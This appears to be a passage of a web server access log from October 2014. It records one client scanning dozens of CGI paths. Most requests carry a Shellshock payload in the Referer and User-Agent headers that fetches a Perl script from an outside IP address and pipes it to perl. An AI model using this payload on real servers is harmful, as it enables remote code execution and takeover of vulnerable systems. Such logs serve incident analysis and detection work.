/cgistartHTTP/1.0" 404 214 "-" "-" +37.48.78.63 - - [31/Oct/2014:06:43:08 +0200] "GET /cgi-sys/realsignup.cgi HTTP/1.0" 404 460 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:08 +0200] "GET /cgi-sys/realhelpdesk.cgi HTTP/1.0" 404 462 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:08 +0200] "GET /cgi-sys/randhtml.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:09 +0200] "GET /cgi-sys/mchat.cgi HTTP/1.0" 404 455 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:09 +0200] "GET /cgi-sys/helpdesk.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:10 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 404 463 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:10 +0200] "GET /cgi-sys/entropybanner.cgi HTTP/1.0" 404 463 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:13 +0200] "GET /cgi-mod/index.cgi HTTP/1.0" 404 455 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:14 +0200] "GET /cgi-bin/YaBB/YaBB.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:15 +0200] "GET /cgi-bin/wwwboard.cgi.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:15 +0200] "GET /cgi-bin/wrap.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:15 +0200] "GET /cgi-bin/wrapHTTP/1.0" 503 323 "-" "-" +37.48.78.63 - - [31/Oct/2014:06:43:18 +0200] "GET /cgi-bin/webspirs.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:19 +0200] "GET /cgi-bin/webmail/html/emumail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:20 +0200] "GET /cgi-bin/webif.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:20 +0200] "GET /cgi-bin/webdist.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:21 +0200] "GET /cgi-bin/webbbs.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:21 +0200] "GET /cgi-bin/way-board/way-board.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:21 +0200] "GET /cgi-bin/way-board.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:21 +0200] "GET /cgi-bin/w3mman2html.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:23 +0200] "GET /cgi-bin/vote.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:23 +0200] "GET /cgi-bin/virgil.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:24 +0200] "GET /cgi-bin/viewcvs.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:24 +0200] "GET /cgi-bin/urlcount.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:24 +0200] "GET /cgi-bin/upload.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:24 +0200] "GET /cgi-bin/ultraboard.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:24 +0200] "GET /cgi-bin/ttawebtop.cgi/HTTP/1.0" 503 323 "-" "-" +37.48.78.63 - - [31/Oct/2014:06:43:25 +0200] "GET /cgi-bin/troops.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:25 +0200] "GET /cgi-bin/traffic.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:26 +0200] "GET /cgi-bin/tigvote.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:26 +0200] "GET /cgi-bin/tidfinder.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:26 +0200] "GET /cgi-bin/testing_whateverHTTP/1.0" 503 323 "-" "-" +37.48.78.63 - - [31/Oct/2014:06:43:26 +0200] "GET /cgi-bin/test2.plHTTP/1.0" 503 323 "-" "-" +37.48.78.63 - - [31/Oct/2014:06:43:26 +0200] "GET /cgi-bin/test/test.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:27 +0200] "GET /cgi-bin/test.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:27 +0200] "GET /cgi-bin/test-cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:28 +0200] "GET /cgi-bin/talkback.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:28 +0200] "GET /cgi-bin/survey.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:28 +0200] "GET /cgi-bin/store/index.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:30 +0200] "GET /cgi-bin/store.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:30 +0200] "GET /cgi-bin/start.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:30 +0200] "GET /cgi-bin/spin_client.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:30 +0200] "GET /cgi-bin/sojourn.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:30 +0200] "GET /cgi-bin/snorkerz.cmdHTTP/1.0" 503 323 "-" "-" +37.48.78.63 - - [31/Oct/2014:06:43:30 +0200] "GET /cgi-bin/snorkerz.batHTTP/1.0" 503 323 "-" "-" +37.48.78.63 - - [31/Oct/2014:06:43:31 +0200] "GET /cgi-bin/smartsearch/smartsearch.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:31 +0200] "GET /cgi-bin/smartsearch.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:31 +0200] "GET /cgi-bin/simplestmail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:31 +0200] "GET /cgi-bin/simplestguest.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:32 +0200] "GET /cgi-bin/showcheckins.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:32 +0200] "GET /cgi-bin/shopplus.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:32 +0200] "GET /cgi-bin/shopper.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:32 +0200] "GET /cgi-bin/shop.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:33 +0200] "GET /cgi-bin/sendform.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:33 +0200] "GET /cgi-bin/search/search.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:33 +0200] "GET /cgi-bin/search.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:33 +0200] "GET /cgi-bin/searchHTTP/1.0" 503 323 "-" "-" +37.48.78.63 - - [31/Oct/2014:06:43:33 +0200] "GET /cgi-bin/scoadminreg.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:34 +0200] "GET /cgi-bin/sbcgi/sitebuilder.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:37 +0200] "GET /cgi-bin/replicator/webpage.cgi/HTTP/1.0" 503 323 "-" "-" +37.48.78.63 - - [31/Oct/2014:06:43:38 +0200] "GET /cgi-bin/register.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:36 +0200] "GET /cgi-bin/responder.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:39 +0200] "GET /cgi-bin/ratlog.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:40 +0200] "GET /cgi-bin/r.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:41 +0200] "GET /cgi-bin/quizme.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:42 +0200] "GET /cgi-bin/quickstore.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:43 +0200] "GET /cgi-bin/publisher/search.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:44 +0200] "GET /cgi-bin/profile.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:46 +0200] "GET /cgi-bin/printenvHTTP/1.0" 503 323 "-" "-" +37.48.78.63 - - [31/Oct/2014:06:43:45 +0200] "GET /cgi-bin/probecontrol.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:47 +0200] "GET /cgi-bin/powerup/r.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:48 +0200] "GET /cgi-bin/postcards.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:49 +0200] "GET /cgi-bin/pollssi.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:50 +0200] "GET /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:52 +0200] "GET /cgi-bin/photo/protected/manage.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:53 +0200] "GET /cgi-bin/photo/manage.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:57 +0200] "GET /cgi-bin/perlshop.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:56 +0200] "GET /cgi-bin/pfdispaly.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:58 +0200] "GET /cgi-bin/pbcgi.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:59 +0200] "GET /cgi-bin/pagelog.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:02 +0200] "GET /cgi-bin/nph-exploitscanget.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:03 +0200] "GET /cgi-bin/nph-emumail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:03 +0200] "GET /cgi-bin/nlog-smb.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:03 +0200] "GET /cgi-bin/newsdesk.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:03 +0200] "GET /cgi-bin/netpad.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:06 +0200] "GET /cgi-bin/musicqueue.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:06 +0200] "GET /cgi-bin/mt/mt-load.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:07 +0200] "GET /cgi-bin/mt/mt-check.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:08 +0200] "GET /cgi-bin/mt-static/mt-check.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:08 +0200] "GET /cgi-bin/mrtg.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:08 +0200] "GET /cgi-bin/mojo/mojo.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:10 +0200] "GET /cgi-bin/mini_logger.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:10 +0200] "GET /cgi-bin/man.shHTTP/1.0" 503 323 "-" "-" +37.48.78.63 - - [31/Oct/2014:06:44:10 +0200] "GET /cgi-bin/main_menu.plHTTP/1.0" 503 323 "-" "-" +37.48.78.63 - - [31/Oct/2014:06:44:11 +0200] "GET /cgi-bin/main.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:11 +0200] "GET /cgi-bin/mailnews.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:11 +0200] "GET /cgi-bin/maillist.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:11 +0200] "GET /cgi-bin/mail/nph-mr.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:11 +0200] "GET /cgi-bin/mail/emumail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:11 +0200] "GET /cgi-bin/magiccard.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:11 +0200] "GET /cgi-bin/MachineInfoHTTP/1.0" 503 323 "-" "-" +37.48.78.63 - - [31/Oct/2014:06:44:12 +0200] "GET /cgi-bin/lwgate.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:12 +0200] "GET /cgi-bin/lookwho.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:13 +0200] "GET /cgi-bin/login.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:13 +0200] "GET /cgi-bin/log-reader.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:13 +0200] "GET /cgi-bin/loadpage.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:13 +0200] "GET /cgi-bin/lastlines.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:14 +0200] "GET /cgi-bin/journal.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:16 +0200] "GET /cgi-bin/ImageFolio/admin/admin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:17 +0200] "GET /cgi-bin/imageFolio.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:17 +0200] "GET /cgi-bin/ikonboard/help.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:17 +0200] "GET /cgi-bin/if/admin/nph-build.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:18 +0200] "GET /cgi-bin/icatHTTP/1.0" 503 323 "-" "-" +37.48.78.63 - - [31/Oct/2014:06:44:18 +0200] "GET /cgi-bin/htsearch.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:19 +0200] "GET /cgi-bin/html2wml.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:19 +0200] "GET /cgi-bin/html2chtml.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:19 +0200] "GET /cgi-bin/hsx.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:19 +0200] "GET /cgi-bin/hitview.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:19 +0200] "GET /cgi-bin/handler/netsonarHTTP/1.0" 503 323 "-" "-" +37.48.78.63 - - [31/Oct/2014:06:44:19 +0200] "GET /cgi-bin/handler.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:20 +0200] "GET /cgi-bin/handlerHTTP/1.0" 503 323 "-" "-" +37.48.78.63 - - [31/Oct/2014:06:44:20 +0200] "GET /cgi-bin/guestbook.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:20 +0200] "GET /cgi-bin/gm.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:20 +0200] "GET /cgi-bin/gm-cplog.cgi HTTP/1.0" 503 516 "() { :; }; curl 